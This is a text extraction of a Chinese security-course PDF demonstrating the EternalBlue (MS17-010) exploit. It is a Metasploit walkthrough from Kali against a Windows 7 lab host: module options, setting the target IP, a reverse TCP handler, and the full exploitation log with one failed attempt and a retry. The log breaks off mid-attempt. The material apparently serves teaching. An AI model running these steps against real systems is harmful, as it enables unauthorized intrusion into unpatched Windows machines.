永恒之蓝漏洞演示.pdf-资料库

MS17-010（永恒之蓝） "永恒之蓝"漏洞利用 Kali Linux -> Windows 7 msf > search ms17_010 msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target. 分区拼客学院安全公开课的第 1 页

Target. Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf exploit(ms17_010_eternalblue) > set RHOST 172.16.70.212 RHOST => 172.16.70.212 msf exploit(ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 172.16.70.212 yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. 分区拼客学院安全公开课的第 2 页

exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target. Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf exploit(ms17_010_eternalblue) > show targets Exploit targets: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf exploit(ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 172.16.70.216:4444 [*] 172.16.70.212:445 - Connecting to target for exploitation. [+] 172.16.70.212:445 - Connection established for exploitation. [+] 172.16.70.212:445 - Target OS selected valid for OS indicated by SMB reply [*] 172.16.70.212:445 - CORE raw buffer dump (38 bytes) [*] 172.16.70.212:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [*] 172.16.70.212:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] 172.16.70.212:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] 172.16.70.212:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 172.16.70.212:445 - Trying exploit with 12 Groom Allocations. 分区拼客学院安全公开课的第 3 页

[*] 172.16.70.212:445 - Trying exploit with 12 Groom Allocations. [*] 172.16.70.212:445 - Sending all but last fragment of exploit packet [*] 172.16.70.212:445 - Starting non-paged pool grooming [+] 172.16.70.212:445 - Sending SMBv2 buffers [+] 172.16.70.212:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 172.16.70.212:445 - Sending final SMBv2 buffers. [*] 172.16.70.212:445 - Sending last fragment of exploit packet! [*] 172.16.70.212:445 - Receiving response from exploit packet [+] 172.16.70.212:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 172.16.70.212:445 - Sending egg to corrupted connection. [*] 172.16.70.212:445 - Triggering free of corrupted buffer. [-] 172.16.70.212:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 172.16.70.212:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 172.16.70.212:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] 172.16.70.212:445 - Connecting to target for exploitation. [+] 172.16.70.212:445 - Connection established for exploitation. [+] 172.16.70.212:445 - Target OS selected valid for OS indicated by SMB reply [*] 172.16.70.212:445 - CORE raw buffer dump (38 bytes) [*] 172.16.70.212:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [*] 172.16.70.212:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] 172.16.70.212:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] 172.16.70.212:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 172.16.70.212:445 - Trying exploit with 17 Groom Allocations. [*] 172.16.70.212:445 - Sending all but last fragment of exploit packet [*] 172.16.70.212:445 - Starting non-paged pool grooming [+] 172.16.70.212:445 - Sending SMBv2 buffers 分区拼客学院安全公开课的第 4 页

[+] 172.16.70.212:445 - Sending SMBv2 buffers [+] 172.16.70.212:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 172.16.70.212:445 - Sending final SMBv2 buffers. [*] 172.16.70.212:445 - Sending last fragment of exploit packet! [*] 172.16.70.212:445 - Receiving response from exploit packet 分区拼客学院安全公开课的第 5 页

分区拼客学院安全公开课的第 6 页

分区拼客学院安全公开课的第 7 页

资料库

永恒之蓝漏洞演示.pdf

相关推荐

网络技术

热门标签

最新资料